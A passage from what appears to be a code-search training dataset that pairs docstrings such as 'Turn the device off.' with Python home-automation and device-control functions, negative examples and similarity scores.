self.write(\"OUT1\\n\")", "async def async_turn_on(self, **kwargs):\n self._wrap_device.device.set_duct_zone(self._zone, True)", "def enable(self):\n self.switch.enable()\n self._enabled = True", "def turn_on(self, **kwargs) -> None:\n self.heater.turn_on()", "def turn_on(self, **kwargs):\n if not self.is_on:\n _LOGGER.debug(\"Sending START command to: %s\", self._name)\n self._api.control('START')\n self._mower_status = STATUS_EXECUTING_START\n self.schedule_update_ha_state()", "def turn_on(self, **kwargs):\n self._state = True\n\n # Make initial update\n self.update_switch(self._initial_transition)\n\n self.schedule_update_ha_state()", "def on(self):\n self._set_state(on=True)", "async def async_turn_on(self, **kwargs: Any) -> None:\n if (brightness := kwargs.get(ATTR_BRIGHTNESS)) is not None:\n # set the brightness, which will also turn on/off light\n if brightness == 255:\n brightness = 256 # this will end up as 16 which is max\n self._device.light_brightness = int(brightness / 16)\n else:\n self._device.light_on = True", "async def async_turn_on(self, **kwargs: Any) -> None:\n self.entity_description.on_off_fn(self._valve, True)\n await self._device.push_state()\n self.async_write_ha_state()", "async def async_turn_on(self):\n data_cmd = _command(COMMAND_POWER_ON)\n await self._async_send_command(data_cmd)", "def turn_on(self, **kwargs: Any) -> None:\n _LOGGER.debug(\"Turn on light %s %s\", self._device.ip, kwargs)\n if not self.is_on:\n self._device.power_on = True\n\n if ATTR_BRIGHTNESS in kwargs and self.brightness != kwargs[ATTR_BRIGHTNESS]:\n self._device.brightness = kwargs[ATTR_BRIGHTNESS]\n\n if ATTR_COLOR_TEMP in kwargs and self.color_temp != kwargs[ATTR_COLOR_TEMP]:\n color_temp = mired_to_kelvin(kwargs[ATTR_COLOR_TEMP])\n self._device.color_temperature = color_temp", "def turn_on(self, **kwargs):\n self._brightness = 100\n self._state = 'on'\n #self._light.brightness = kwargs.get(ATTR_BRIGHTNESS, 255)\n #self._light.turn_on()\n _LOGGER.info(\"turn_on() is called\")", "def lightning_turnon(self):\n self.turnOn()", "def on(self):\n if not self._is_on:\n self._pwms.enable(self._pin_index, self._frequency)\n self._is_on = True", "async def async_turn_on(self, **kwargs: Any) -> None:\n await self._switch.async_on()\n self._attr_is_on = True\n self.async_write_ha_state()", "def turn_on(self):\n self._data.homestatus.setroomThermpoint(\n self._data.home_id, self._room_id, STATE_NETATMO_HOME\n )\n self.update_without_throttle = True\n self.schedule_update_ha_state()", "def turn_on(self) -> None:\n\n chromecast = self._get_chromecast()\n if not chromecast.is_idle:\n # Already turned on\n return\n\n if chromecast.app_id is not None:\n # Quit the previous app before starting splash screen or media player\n chromecast.quit_app()\n\n # The only way we can turn the Chromecast is on is by launching an app\n if chromecast.cast_type == pychromecast.const.CAST_TYPE_CHROMECAST:\n app_data = {\"media_id\": CAST_SPLASH, \"media_type\": \"image/png\"}\n quick_play(chromecast, \"default_media_receiver\", app_data)\n else:\n chromecast.start_app(pychromecast.config.APP_MEDIA_RECEIVER)", "def _turn_on(self):\n logger.info(\"Check antenna power\")\n power = yield WaitDBus(self.gsm_device.GetAntennaPower)\n logger.info(\"antenna power is %d\", power)\n if power:\n yield None\n logger.info(\"turn on antenna power\")\n try:\n yield WaitDBus(self.gsm_device.SetAntennaPower, True)\n except dbus.exceptions.DBusException, ex:\n if ex.get_dbus_name() != 'org.freesmartphone.GSM.SIM.AuthFailed':\n raise\n yield self._ask_pin()", "def turnOnSdkMode(self):\n \n command = b\"\\x90\\x01\\x01\"\n #print(\"turnOnSdkMode run, command: \")\n #print(command)\n \n self.sendCommand(command)", "def turn_on(self, **kwargs):\n self.enabled = self.fritz_box.set_call_forwarding(self.uid, 1)", "async def async_turn_on(self) -> None:\n await self._device.leave_standby()", "async def async_turn_on(self, **kwargs: Any) -> None:\n\n self._attr_is_on = await self.relay.set_active(True)\n self.async_write_ha_state()", "def servo_on(self):\n self.logger.info('Setting servo ON')\n self.electronics.move_servo(1)\n self.config['servo']['status'] = 1", "def turn_on(self, **kwargs):\n setattr(self.resource, self.variable, True)", "def on(self):\n\t\trb0 = [0x00]\n\t\trb1 = [0x00, 0x00]\n\t\tattempts = 0\n\n\t\twhile self.state != ON and attempts < MAX_RETRIES:\n\t\t\tself.spi.transfer([0x03], rb0, 1)\t\t## Send the command byte; response will be written to rb0\n\t\t\ttime.sleep(9e-3) \t\t\t\t\t\t## Sleep for 9 ms\n\t\t\tself.spi.transfer([0x00, 0x01], rb1, 2)\t## Send the following 2 bytes; response will be written to rb1\n\t\t\ttime.sleep(0.1)\n\n\t\t\tif rb0[0] < 0: \t\t\t\t\t\t## Account for implicit unsigned-to-signed \n\t\t\t\trb0[0] += 256\t\t\t\t\t## conversion from the transfer operation\n\n\t\t\tattempts += 1\n\t\t\tprint(f\"[{self.__class__.__name__}::on]\", end=' ')\n\t\t\tif rb0[0] == 0xF3 and rb1[0] == 0x03: \t## Ensure response values are as expected\n\t\t\t\tself.state = ON \n\t\t\t\tprint(\"SUCCESS -- device powered on.\")\n\t\t\telse:\n\t\t\t\tif attempts != MAX_RETRIES:\n\t\t\t\t\tprint(f\"Attempt #{attempts} failed -- retrying after delay ...\")\n\t\t\t\t\ttime.sleep(RETRY_DELAY)\n\t\t\t\telse:\n\t\t\t\t\tprint(\"ERROR -- command failed.\")\n\n\t\treturn self.state == ON", "def turn_on(\n self,\n speed: str = None,\n percentage: int = None,\n preset_mode: str = None,\n **kwargs,\n ) -> None:\n self.wink.set_state(True, speed)", "def mark_playfield_active_from_device_action(self):\n self._playfield_switch_hit()", "def power_on(self, port, data_sync=True):\n port = int(port)\n self._validate_port(\"power_on\", port)\n if data_sync:\n self.set_mode(SYNC, port)\n else:\n self.set_mode(CHARGE, port)", "def turnOn(self):\n self.write('E;O1;E;')\n return self.output()", "def switch_on(self, boot_timeout=None, settledown_duration=None,\n simple_switch_mode=False):\n raise DeviceException(DeviceException.FEATURE_NOT_IMPLEMENTED)", "def turn_on(self, speed=None, **kwargs):\n self._bond.turnOn(self._deviceId)\n if speed is not None:\n self.set_speed(speed)", "def on(self):\n print(f\"RF {self.name} on\")\n self.status(True)", "async def async_turn_on(self, **kwargs):\n if self._switch_type == \"record_motion\":\n _LOGGER.debug(f\"Turning on Motion Detection for {self._name}\")\n await self.upv.set_camera_recording(self._camera_id, TYPE_RECORD_MOTION)\n elif self._switch_type == \"record_always\":\n _LOGGER.debug(\"Turning on Constant Recording\")\n await self.upv.set_camera_recording(self._camera_id, TYPE_RECORD_ALWAYS)\n elif self._switch_type == \"record_smart\":\n _LOGGER.debug(\"Turning on SmartDetect Recording\")\n await self.upv.set_camera_recording(\n self._camera_id, TYPE_RECORD_SMARTDETECT\n )\n elif self._switch_type == \"ir_mode\":\n _LOGGER.debug(\"Turning on IR\")\n await self.upv.set_camera_ir(self._camera_id, self._ir_on_cmd)\n elif self._switch_type == \"hdr_mode\":\n _LOGGER.debug(\"Turning on HDR mode\")\n await self.upv.set_camera_hdr_mode(self._camera_id, True)\n elif self._switch_type == \"high_fps\":\n _LOGGER.debug(\"Turning on High FPS mode\")\n await self.upv.set_camera_video_mode_highfps(self._camera_id, True)\n else:\n _LOGGER.debug(\"Changing Status Light to On\")\n await self.upv.set_camera_status_light(self._camera_id, True)\n await self.protect_data.async_refresh(force_camera_update=True)", "async def async_turn_on(self, **kwargs):\n await self.data.set_appliance_state(self.appliance_id, True)\n return True", "async def async_turn_on(self) -> None:\n self._zone.power = True", "def on(self):\n status = self.dev.ctrl_transfer(0x40, 0x01, 0x0001, 0xa0, [])\n if status == 0:\n self.ev.set()\n return (status == 0)", "async def async_turn_on(self, **kwargs):\n if self.entity_description.turn_on_fn is None:\n raise NotImplementedError()\n if not self.is_on:\n await self.entity_description.turn_on_fn(self._wrap_device)", "def turn_on(self, **kwargs: Any) -> None:\n if self.type == \"on_off\":\n _LOGGING.debug(\"Starting all torrents\")\n self._tm_client.api.start_torrents()\n elif self.type == \"turtle_mode\":\n _LOGGING.debug(\"Turning Turtle Mode of Transmission on\")\n self._tm_client.api.set_alt_speed_enabled(True)\n self._tm_client.api.update()", "def turn_on(self, **kwargs):\n _LOGGER.debug(\"Turning on Motion Detection \")\n self.data.set_camera_recording(self._camera_id, \"motion\")", "def wifi_on(self):\n self._clear_read_buffer()\n self._write_cmd(\"PE01\")\n time.sleep(100e-3)", "def turn_on(self, **kwargs):\n self.vacuum.start()", "def turnLightingSystemOn():\n dislin.light('ON')", "def set_light_on(self):\r\n self._light = \"ON\"", "async def async_turn_on(self, **kwargs: Any) -> None:\n await self.async_publish(\n self._config[CONF_COMMAND_TOPIC],\n self._config[CONF_PAYLOAD_ON],\n self._config[CONF_QOS],\n self._config[CONF_RETAIN],\n self._config[CONF_ENCODING],\n )\n if self._optimistic:\n # Optimistically assume that switch has changed state.\n self._attr_is_on = True\n self.async_write_ha_state()", "async def async_turn_on(self, **kwargs: Any) -> None:\n self._is_on = True\n await self.enable_rain_delay()", "async def async_turn_on(self, **kwargs: Any) -> None:\n await self._set_state(True)", "def switch_on(self,name):\n self.circles[name].switch_on()\n self.cursor.execute(\"\"\"UPDATE sensors_powersensor SET state=1 WHERE target=%s\"\"\", (name,))", "async def async_turn_on(self, **kwargs: Any) -> None:\n await self.entity_description.set_command(self, True)", "def set_light_on(self):\n self._light = \"ON\"", "def turn_on(self, **kwargs):\n self.set_graceful_lock(True)\n self.robot.start_cleaning()", "async def async_set_wifi_led_on(self):\n return", "def turnOn(self):\n self.off = False\n self.turnOnAnimation()", "def switch_on(self):\n if threading.current_thread() != self._blinking_thread:\n self._blinking_thread.unregister(self)\n GPIO.output(self.pin, GPIO.HIGH)", "def test_device_on(self):\n self.ms.add_response({'\\x14081031031E226410\\x0D': 'PA\\x0D'})\n # Network / Device ID\n response = self.upb.on((49, 3))\n self.assertTrue(response)", "async def async_turn_on(\n self,\n speed: Optional[str] = None,\n percentage: Optional[int] = None,\n preset_mode: Optional[str] = None,\n **kwargs: Any,\n ) -> None:\n if preset_mode is not None:\n await self.async_set_preset_mode(preset_mode)\n if preset_mode == PRESET_MODE_WHOOSH:\n self._device.sleep_mode = True\n return\n if percentage is None:\n self._device.fan_on = True\n return\n await self.async_set_percentage(percentage)", "def turn_on(self):\n repeatedFEs = {19200:25, 9600:13, 4800:7, 1200:3, 300:2}\n on_cmd_pre = [0xFE] * repeatedFEs[self.connection.BAUD]\n on_cmd = Command()\n on_cmd.set_num(0x18)\n on_cmd.set_subcmd_num(0x01)\n\n self.connection.send_cmd(on_cmd_pre + on_cmd.render())", "async def async_turn_on(self, **kwargs) -> None:\n self._state = await self._gate.turn_on_light(self._light_id)", "def turn_on(self, **kwargs):\n onValue = str((kwargs.get(ATTR_BRIGHTNESS, int(self._brightness))/255)*100)\n request = requests.post(self._resource,\n data=onValue,\n timeout=10)\n if (request.status_code == 200) or (request.status_code == 201):\n self._state = True\n else:\n _LOGGER.info(\"HTTP Status Code: %s\", request.status_code)\n _LOGGER.error(\"Can't turn on %s. Is resource/endpoint offline?\", self._resource)\n\n self.schedule_update_ha_state()", "def enable(self):\n if not self.tm_started:\n for name, tm in self.air_traffic_manager.items():\n logging.debug(\"Starting tm %s\" % name)\n tm.start()\n tm_started = True\n\n logging.debug(\"Enabling switch %s\" % self.name)\n self.disabled = False", "def enable_motor():\n print('Enabling motor')\n start_motor = '{\"id\" : \"Motor1\", \"enabled\" : \"1\"}'\n SERIAL_PARENT.send(start_motor)\n OUTGOING.append(start_motor)", "def enable(self):\n options = self.get_direction_options()\n self.direction = options[0]\n self.state['enabled'] = True\n self.sound_manager.play_loop('std')", "async def async_turn_on(self) -> None:\n if CONF_POWER_COMMAND_TOPIC in self._config:\n mqtt_payload = self._command_templates[CONF_POWER_COMMAND_TEMPLATE](\n self._config[CONF_PAYLOAD_ON]\n )\n await self._publish(CONF_POWER_COMMAND_TOPIC, mqtt_payload)\n return\n # Fall back to default behavior without power command topic\n await super().async_turn_on()", "def turn_on(self, **kwargs) -> None:\n _LOGGER.debug(\n \"SynoDSMSurveillanceHomeModeToggle.turn_on(%s)\",\n self._api.information.serial,\n )\n self._api.surveillance_station.set_home_mode(True)", "async def async_turn_on(self, **kwargs: Any) -> None:\n await self.call_state_change(\"open\")", "async def async_turn_on(self):\n await self.async_mute_volume(False)", "def turn_on(self, **kwargs):\n _LOGGER.error(\"DALI TURN ON\")\n\n self._state = True\n\n if ATTR_BRIGHTNESS in kwargs:\n _LOGGER.error(kwargs[ATTR_BRIGHTNESS])\n\n bri = kwargs[ATTR_BRIGHTNESS]\n\n if bri == 0:\n self._state = False\n else:\n bri = int(bri / 1.5)\n _LOGGER.error(bri)\n\n\n url = self.urlx + '/dimset?bri=' + str(bri)\n headers = {'x-ha-access': 'raspberry',\n 'content-type': 'application/json'}\n\n response = get(url, headers=headers)\n _LOGGER.error(response.text)\n\n json_data = json.loads(response.text)\n _LOGGER.error(json_data)\n\n self._dimmer = kwargs[ATTR_BRIGHTNESS]\n\n else:\n url = self.urlx + '/toggle'\n headers = {'x-ha-access': 'raspberry',\n 'content-type': 'application/json'}\n\n response = get(url, headers=headers)\n _LOGGER.error(response.text)\n\n json_data = json.loads(response.text)\n _LOGGER.error(json_data)\n\n state = json_data['state']\n self._dimmer = 255\n self._state = state == 'on'" ]
[ "0.8281669", "0.7963511", "0.7818252", "0.7757262", "0.7712496", "0.7595535", "0.7588195", "0.7578901", "0.751521", "0.7514764", "0.7510081", "0.75018376", "0.74641955", "0.74501693", "0.7437987", "0.7409389", "0.7357094", "0.73516375", "0.73505986", "0.73295283", "0.7277296", "0.72177243", "0.71967274", "0.7192182", "0.7173079", "0.7159582", "0.71592605", "0.71592605", "0.7153755", "0.7136868", "0.7087433", "0.70812875", "0.705977", "0.7050677", "0.7048706", "0.7028616", "0.69977933", "0.69531614", "0.6948858", "0.6926658", "0.68842614", "0.68735296", "0.6869603", "0.6857102", "0.6856778", "0.6851375", "0.68471503", "0.68368435", "0.68358994", "0.6796191", "0.6783157", "0.6775177", "0.6773509", "0.6755645", "0.673851", "0.67333585", "0.67048275", "0.670245", "0.6685518", "0.66847533", "0.6678895", "0.66778815", "0.6677662", "0.66712916", "0.66677094", "0.6660014", "0.66347116", "0.66248816", "0.66185164", "0.65960145", "0.6585551", "0.65837806", "0.6574945", "0.65724915", "0.6566501", "0.6553124", "0.65378517", "0.65368927", "0.65264386", "0.65048814", "0.6495898", "0.6495671", "0.6485879", "0.6475109", "0.64673036", "0.64533794", "0.64509684", "0.6437297", "0.6428574", "0.6428406", "0.6406556", "0.63966286", "0.63888717", "0.6380407", "0.63798463", "0.6374436", "0.63694054", "0.6357835", "0.63563496", "0.63546944" ]
0.6726692
56
Turn the device off.
async def async_turn_off(self, **kwargs): if self._switch_type == "ir_mode": _LOGGER.debug("Turning off IR") await self.upv.set_camera_ir(self._camera_id, self._ir_off_cmd) else: _LOGGER.debug("Turning off Recording") await self.upv.set_camera_recording(self._camera_id, TYPE_RECORD_NEVER) await self.coordinator.async_request_refresh()
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def turn_off(self):\n self._state = False\n if(self._device['type'] == '_DT-PLUG' or self._device['type'] == '_THIMR'):\n self._send_cmd(self._device, 'cmd=ctrl&devices={[' + self._device[\"sid\"] + ']}&op={\"cmd\":5,\"op\":0 }', 5)\n if(self._device['type'] == '_REALY2' or self._device['type'] == '_REALY4'): \n self._send_cmd(self._device, 'cmd=ctrl&devices={[' + self._device[\"sid\"] + ']}&op={\"cmd\":5,\"'+ self._data_key +'\":0 }', 5)", "def turn_off(self, **kwargs):\n self.smartplug.turn_off()", "def off(config: dict):\n switch_device(config, config[\"inching\"], \"off\")", "def turn_off(self, **kwargs):\n set_sonoff_state(self._host, \"off\")\n self._state = False", "def turn_off(self, **kwargs: Any) -> None:\n self._device.power_on = False\n _LOGGER.debug(\"Turn off light %s\", self._device.ip)", "def turn_off(self):\n self.handleCommand(1)\n self._state = STATE_OFF", "def turn_off(self, **kwargs):\n self._is_on = False", "def switch_off(self):\n raise DeviceException(DeviceException.FEATURE_NOT_IMPLEMENTED)", "def turnOff(self):\n self.write(\"E;O0;E;\")\n return self.output()", "def turn_off(self):\n GPIO.output(self.gpio, False) # turn off light", "def turn_off(self, **kwargs: Any) -> None:\n with self._wemo_call_wrapper(\"turn off\"):\n self.wemo.off()", "def setOff(self, command):\r\n self.setDriver('ST', 0)", "def _turn_off(self):\n self._turn_display('OFF')", "def off(self):\n self._set_state(on=False)", "def turn_off(self, **kwargs) -> None:\n self.wink.set_state(False)", "def turn_off(self, **kwargs: Any) -> None:\n if (\n DPCODE_LIGHT in self.tuya_device.status\n and DPCODE_SWITCH not in self.tuya_device.status\n ):\n commands = [{\"code\": DPCODE_LIGHT, \"value\": False}]\n else:\n commands = [{\"code\": DPCODE_SWITCH, \"value\": False}]\n self._send_command(commands)", "def turn_off(self) -> None:\n self._monoprice.set_power(self._zone_id, False)", "def turn_off(self):\n print(\"Turning the lights off\")\n self.led.all_off()\n self.client.publish(STATE_TOPIC, OFF) #publish", "def turn_off(self, **kwargs) -> None:\n self._device.writeCharacteristic(self._handle, b'\\x01', True)\n self._state = False\n self.schedule_update_ha_state()", "def turn_off(self):\n self._interrupt_flash()\n if self.on:\n GPIO.output(self.pin, GPIO.LOW)\n self.on = False", "def turn_off(self, **kwargs: Any) -> None:\n self._set_light(OFF_STATE)", "def turn_off(self, **kwargs):\n self._send_command(\"turn_off\")", "def turn_off(self):\n self._state = False\n self.write_state(bytes([1]))\n self.schedule_update_ha_state()", "async def async_turn_off(self, **kwargs: Any) -> None:\n self._device.light_on = False", "def off(self):\n print(f\"RF {self.name} off\")\n self.status(False)", "async def async_turn_off(self, **kwargs: Any) -> None:\n self._device.fan_on = False", "async def async_turn_off(self, **kwargs: Any) -> None:\n await self._client.turn_off(self._device_port)", "def turn_off(self, **kwargs):\n _LOGGER.error(\"DALI TURN OFF\")\n self._state = False\n\n url = self.urlx + '/toggle'\n headers = {'x-ha-access': 'raspberry',\n 'content-type': 'application/json'}\n\n response = get(url, headers=headers)\n _LOGGER.error(response.text)\n\n json_data = json.loads(response.text)\n _LOGGER.error(json_data)\n\n state = json_data['state']\n\n self._dimmer = 0\n\n self._state = state == 'on'", "def turn_off(self, **kwargs: Any) -> None:\n self._light.turn_off()", "def off_switch(self):\n self._switch_callback = None", "def turn_off(self):\n self.write(\"OUT0\\n\")", "def turn_off(self, **kwargs):\n self.vacuum.stop()\n self.vacuum.home()", "def turn_off(self, **kwargs):\n #self._light.turn_off()\n self._brightness = 0\n self._state = 'off'\n _LOGGER.info(\"turn_off() is called\")", "def turn_off(self):\n self.robot.stop_simulation()", "def off(self):\n if self._is_on:\n self._pwms.disable(self._pin_index)\n self._is_on = False", "def turn_off(self, **kwargs):\n self._client.set_brightness(self._id, 0)", "def turn_off(self, **kwargs):\n self.robot.pause_cleaning()\n time.sleep(1)\n self.robot.send_to_base()", "def turn_off(self):\n self.set_pin(0, -1)\n self.set_pin(1, -1)\n self.set_pin(2, -1)", "async def async_turn_off(self, **kwargs: Any) -> None:\n\n await self.entity_description.ufp_set(self.device, False)", "async def async_turn_off(self, **kwargs: Any) -> None:\n\n await self.entity_description.ufp_set(self.device, False)", "def turn_off(self, **kwargs):\n self._is_on = False\n self.schedule_update_ha_state()\n self.hass.data[ZIGATE_DOMAIN].action_onoff(self._device.addr,\n self._endpoint,\n 0)", "async def async_turn_off(self, **kwargs):\n self._wrap_device.device.set_duct_zone(self._zone, False)", "def turn_off(self) -> None:\n self._media_title = None\n self._state = self._player.turn_off()", "def lightning_turnoff(self):\n self.turnOff()", "def turnOff(self):\n self.off = True\n self.turnOffAnimation()", "def turnLightingSystemOff():\n dislin.light('OFF')", "async def async_turn_off(self, **kwargs):\n try:\n if await self._api.set_relay_state(self._dev_id, \"off\"):\n self._is_on = False\n self.async_write_ha_state()\n except Smile.PlugwiseError:\n _LOGGER.error(\"Error while communicating to device\")", "def off(self):\n self.state = \"OFF\"\n logger.info(\"Turning off %s lamp at %s port %s plug %s\" % (self.name,\n self.host,\n self.port,\n self.plug))\n return self.send_cmd(\"pset %s 0\" % self.plug)", "def turn_off(self, **kwargs):\n _LOGGER.debug(\"Turning off Motion Detection \")\n self.data.set_camera_recording(self._camera_id, \"never\")", "def turn_off(self, **kwargs):\n self._attributes['current_speed'] = SPEED_OFF\n self._bond.turnOff(self._deviceId)", "def turn_off(self, **kwargs):\n if self.is_on:\n _LOGGER.debug(\"Sending STOP command to: %s\", self._name)\n self._api.control('STOP')\n self._mower_status = STATUS_EXECUTING_STOP\n self.schedule_update_ha_state()", "def systemOff():\n # Updated 11/19/16\n I2C.write_byte_data(Valve_bus, pinOut_O, 0x00 )\n I2C.write_byte_data(Pump_Mag_bus, pinOut_O, 0x00)", "async def async_turn_off(self):\n path = \"/interface\"\n param = \"default-name\"\n if \"-\" in self._data[\"port-mac-address\"]:\n param = \"name\"\n value = self._data[param]\n mod_param = \"disabled\"\n mod_value = True\n self._ctrl.set_value(path, param, value, mod_param, mod_value)\n\n if self._data[\"poe-out\"] == \"auto-on\":\n path = \"/interface/ethernet\"\n self._ctrl.set_value(path, param, value, \"poe-out\", \"off\")\n\n await self._ctrl.async_update()", "def stop_device(self):\n\n self.state = 'stopped'", "def turn_off(self, **kwargs):\n self.heater.turn_off()", "def turn_off(self, **kwargs):\n setattr(self.resource, self.variable, False)", "def ToggleOff(self):\n for s in self.sensors:\n self.gSetpt[s.GetID()].Disable()\n\n self.top_sizer.Layout()\n print(\"Toggle off\")", "def power_off(self):\n LOG.info('Powering off system')\n self._run_shutdown_command('poweroff')", "def wifi_off(self):\n self._clear_read_buffer()\n self._write_cmd(\"PE00\")\n time.sleep(100e-3)", "def turn_off(self, **kwargs):\n self._state = False\n self.schedule_update_ha_state()\n self._hs_color = None\n self._attributes[\"hs_color\"] = self._hs_color\n self._attributes[\"brightness\"] = None", "def servo_off(self):\n self.logger.info('Setting servo OFF')\n self.electronics.move_servo(0)\n self.config['servo']['status'] = 0", "def switch_off(self,name):\n self.circles[name].switch_off()\n self.cursor.execute(\"\"\"UPDATE sensors_powersensor SET state=0 WHERE target=%s\"\"\", (name,))", "def set_light_off(self):\r\n self._light = \"OFF\"", "def set_light_off(self):\n self._light = \"OFF\"", "def off(self):\n return self.device.off(self.station_number)", "def turn_off(self) -> None:\n self._get_chromecast().quit_app()", "async def async_turn_off(self) -> None:\n await self._device.enter_standby()", "def off(self):\n status = self.dev.ctrl_transfer(0x40, 0x01, 0x0001, 0x20, [])\n if status == 0:\n self.ev.clear()\n return (status == 0)", "def turn_off(self, **kwargs):\n if (CommandSwitch._switch(self._command_off) and\n not self._command_state):\n self._state = False\n self.schedule_update_ha_state()", "async def async_turn_off(self) -> None:\n self._zone.power = False", "async def async_turn_off(self, **kwargs: Any) -> None:\n await self._switch.async_off()\n self._attr_is_on = False\n self.async_write_ha_state()", "def switch_off(self):\n if threading.current_thread() != self._blinking_thread:\n self._blinking_thread.unregister(self)\n GPIO.output(self.pin, GPIO.LOW)", "async def async_turn_off(self, **kwargs):\n await self._endpoint.on_off.off()\n self._state = False", "def turnOff(self, deviceID):\r\n \r\n return self._performAction(deviceID, _API_DEVICE_ACTION_TURN_OFF)", "def power_off(self, port):\n port = int(port)\n self._validate_port(\"power_off\", port)\n self.set_mode(OFF, port)", "def turn_off_modem(self):\n if self.is_power_on():\n self._logger.debug(\"Switching modem off...\")\n self.set_pin()\n GPIO.cleanup()\n # give modem some time to log out\n time.sleep(5)\n else:\n self._logger.debug(\"GSM modem is already OFF...\")", "def turn_off(self, **kwargs: Any) -> None:\n self._light.turn_off()\n if self._brightness:\n self._last_brightness = self._brightness", "async def async_turn_off(self, **kwargs):\n try:\n state_off = await self._api.set_relay_state(\n self._dev_id, self._members, \"off\"\n )\n if state_off:\n self._is_on = False\n self.async_write_ha_state()\n except PlugwiseException:\n _LOGGER.error(\"Error while communicating to device\")", "def sm_output_off(self):\n self.sm.output_off()", "def turn_off_motors():\n MOTOR_HAT.release_motors()", "def turn_off(self):\n if self._module_type == NA_VALVE:\n self._data.homestatus.setroomThermpoint(\n self._data.home_id,\n self._room_id,\n STATE_NETATMO_MANUAL,\n DEFAULT_MIN_TEMP,\n )\n elif self.hvac_mode != HVAC_MODE_OFF:\n self._data.homestatus.setroomThermpoint(\n self._data.home_id, self._room_id, STATE_NETATMO_OFF\n )\n self.update_without_throttle = True\n self.schedule_update_ha_state()", "def off(self) -> bool:\n off_cmd = HomeAssistantPlugin.service_map[self.domain.lower()][\"off\"]\n return self.send(off_cmd)", "def turn_off(self, **kwargs):\n request = requests.post(self._resource, data=\"0\", timeout=10)\n if (request.status_code == 200) or (request.status_code == 201):\n self._state = False\n else:\n _LOGGER.error(\"Can't turn off %s. Is resource/endpoint offline?\",\n self._resource)\n\n self.schedule_update_ha_state()", "def servo_off(self):\n msg = b'\\x0C\\x00'\n self.__bt.write(msg)", "async def async_turn_off(self):\n data_cmd = _command(COMMAND_POWER_OFF)\n await self._async_send_command(data_cmd)", "def disable(self):\n self.direction = None # remove direction\n self.state['enabled'] = False # reset states\n self.state['return'] = False\n self.return_path = None # remove path\n if self.state['blue']:\n self.stop_blue_state(resume_audio=False)\n self.image, _ = self.norm_images.get_image() # reset image\n self.sound_manager.stop()", "def turn_off(self, **kwargs):\n self.enabled = self.fritz_box.set_call_forwarding(self.uid, 0)", "def doShutdownDevice(self):\n if self.device is not None:\n self.device.reset()\n self.device = None", "def off_all(self):\n self._set_status(\"off\", \"11111111\")", "def turn_output_off(self):\n self.instr.write('RF0')\n time.sleep(self.sleep_time)", "def off(self):", "async def async_turn_off(self, **kwargs: Any) -> None:\n\n extra_state = self.extra_state_attributes or {}\n prev_mic = extra_state.get(ATTR_PREV_MIC, self._previous_mic_level)\n prev_record = extra_state.get(ATTR_PREV_RECORD, self._previous_record_mode)\n await self.device.set_privacy(False, prev_mic, prev_record)", "def resetDeviceStates(self):", "def off(self):\n self._make_event(0)", "def power_off(self):\n return self.inst.write(':OUTP OFF')", "async def async_turn_off(self, **kwargs: Any) -> None:\n self._attr_is_on = await self.relay.set_active(False)\n self.async_write_ha_state()", "async def async_set_wifi_led_off(self):\n return", "def turn_off(self, **kwargs: Any) -> None:\n if self.type == \"on_off\":\n _LOGGING.debug(\"Stopping all torrents\")\n self._tm_client.api.stop_torrents()\n if self.type == \"turtle_mode\":\n _LOGGING.debug(\"Turning Turtle Mode of Transmission off\")\n self._tm_client.api.set_alt_speed_enabled(False)\n self._tm_client.api.update()", "def stop(self):\n self.turnOffMotors()", "def _turn_off_light(self, light):\n self.bridge.set_light(light, 'on', False)\n return True" ]
[ "0.8548868", "0.8254268", "0.8161882", "0.8142198", "0.8119367", "0.807117", "0.7936932", "0.7904594", "0.7890579", "0.78688365", "0.7838398", "0.7834393", "0.78312963", "0.77885693", "0.77876323", "0.7755004", "0.77309066", "0.77295303", "0.7704694", "0.76726454", "0.76484203", "0.76282126", "0.76206577", "0.7614615", "0.7594031", "0.7586658", "0.75629306", "0.7555474", "0.75449514", "0.74997354", "0.74818355", "0.74550915", "0.7448442", "0.74359214", "0.74267596", "0.74171984", "0.741081", "0.7408898", "0.73999923", "0.73999923", "0.73996896", "0.7398373", "0.7394856", "0.7393185", "0.7349214", "0.73279846", "0.7325014", "0.7320183", "0.73091954", "0.7295666", "0.7276982", "0.72758347", "0.7253707", "0.7248973", "0.7246335", "0.7240697", "0.7234233", "0.72154397", "0.7210906", "0.7204448", "0.7203815", "0.72009724", "0.7200068", "0.7188922", "0.7187006", "0.71790576", "0.7175677", "0.7146277", "0.7110458", "0.7101454", "0.7100556", "0.7082088", "0.70810884", "0.70716727", "0.706673", "0.70462906", "0.7034192", "0.70336556", "0.70305085", "0.7027966", "0.7004749", "0.6978105", "0.69653124", "0.6944579", "0.6926702", "0.6920078", "0.69175893", "0.6915505", "0.69128543", "0.691008", "0.6908632", "0.69043756", "0.6900242", "0.6890506", "0.68879473", "0.68783504", "0.6874964", "0.68602836", "0.6857135", "0.6849824" ]
0.69212335
85
Given an Item Number and library data dict Return the name of the library it's found in, and the symbol name
def findSymbolByItemnum(itemnum, libs_dict): e_itemnum = re.escape(itemnum) for libname, dat in libs_dict.items(): m = re.search(r'^DEF ([^ ]*) .*(?:\n[^\$].+)+\nF ?\d+ "'+e_itemnum+r'".* "Item Number"\n', dat, re.MULTILINE) try: symname = m.group(1) return libname, symname except: continue return None, None
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def get_name_with_lib(datablock):\r\n text = datablock.name\r\n if datablock.library:\r\n # text += ' (Lib: \"%s\")' % datablock.library.name\r\n text = \"L \" + text\r\n return text", "def get_symbols(doc, lib):\n\n basename = lib.replace(\".dll\", \"\").lower()\n filename = os.path.join(get_hopper_script_dir(), basename + \".txt\")\n if not os.path.exists(filename):\n doc.log(\"Symbol file not found: %s\" % filename)\n return None\n\n symbols = {}\n with open(filename, \"r\") as fp:\n for i, line in enumerate(fp, 1):\n match = symbol_line.match(line)\n if not match:\n doc.log(\"Skipping line %d: Malformed\" % i)\n continue\n\n ordinal, name = match.group(1), match.group(2)\n if ordinal and name:\n symbols[ordinal] = name\n\n return symbols", "def get_library_name(self, linker):\n return linker.get_library_name(self.__library.get_name())", "def get_material(material):\n for libn,tdict in liblist:\n if material in tdict:\n return tdict[material]\n print (material, \" not found\")\n raise KeyError", "def get_library_name(self, op):\n if op.startswith(\"/\"):\n return op\n # Check if the library is specified verbatim. If yes, no need to expand.\n if re.match(r'lib.+\\.so(\\..*)?', op):\n return op\n libname = \"lib%s.so\" % (op)\n # Shared object may be linker script, if so, it will tell actual shared object.\n for ii in self.__library_directories:\n current_libname = locate(ii, libname)\n if current_libname and file_is_ascii_text(current_libname):\n fd = 